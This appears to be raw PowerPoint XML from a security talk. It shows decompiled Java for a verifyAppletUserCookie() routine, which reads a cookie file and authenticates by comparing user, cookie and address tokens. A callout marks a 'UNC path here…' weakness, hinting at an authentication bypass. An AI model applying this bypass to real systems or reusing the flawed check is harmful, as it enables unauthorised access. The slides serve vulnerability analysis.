              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Выноска 1 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635896" y="3140968"/>
            <a:ext cx="1296144" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 1608"/>
              <a:gd name="adj4" fmla="val -111382"/>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Fun</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Выноска 1 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3629958" y="4199448"/>
            <a:ext cx="1302082" cy="1029752"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 2978"/>
              <a:gd name="adj4" fmla="val -114661"/>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Self-importance and fun </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Выноска 1 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635896" y="5445224"/>
            <a:ext cx="1296144" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val -43160"/>
              <a:gd name="adj4" fmla="val -115085"/>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Community and fun</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Прямоугольник 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1345163"/>
            <a:ext cx="5438304" cy="859701"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22"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9">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19">
                                            <p:bg/>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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34"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20">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>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0">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20">
                                            <p:bg/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46"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21">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>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1">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21">
                                            <p:bg/>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1" presetClass="entr" presetSubtype="2"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heel(2)">
                                      <p:cBhvr>
                                        <p:cTn id="5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9" grpId="0" uiExpand="1" build="p" animBg="1"/>
      <p:bldP spid="20" grpId="0" uiExpand="1" build="p" animBg="1"/>
      <p:bldP spid="21" grpId="0" uiExpand="1" build="p"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496" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>verifyAppletUserCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-396552" y="980728"/>
            <a:ext cx="9217024" cy="5616624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = new File(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookieFilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	. . . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inputstreamreader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>InputStreamReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>			                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>), "UTF8");       	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	 . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>        	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>inputstreamreader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>        	. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = new String(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a: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20</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Выноска 1 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732240" y="1340768"/>
            <a:ext cx="1296144" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 139715"/>
              <a:gd name="adj4" fmla="val -129297"/>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UNC path here…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192815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88640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>verifyAppletUserCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-201216" y="980728"/>
            <a:ext cx="9021688" cy="5544616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>if((j = s7.indexOf("&lt;user ", j)) &lt;= 0) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> k = s7.indexOf("&gt;", j);       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>if(k == -1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                         break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>s2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>getStringToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, "user=\"", "\"", j, k);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>            . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>s3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>getStringToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, "cookie=\"", "\"", j, k);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>            . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>s4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>getStringToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, "address=\"", "\"", j, k);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>.equalsIgnoreCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>.equalsIgnoreCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>) &amp;&amp;\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>appletUserAddress.equalsIgnoreCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>s4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
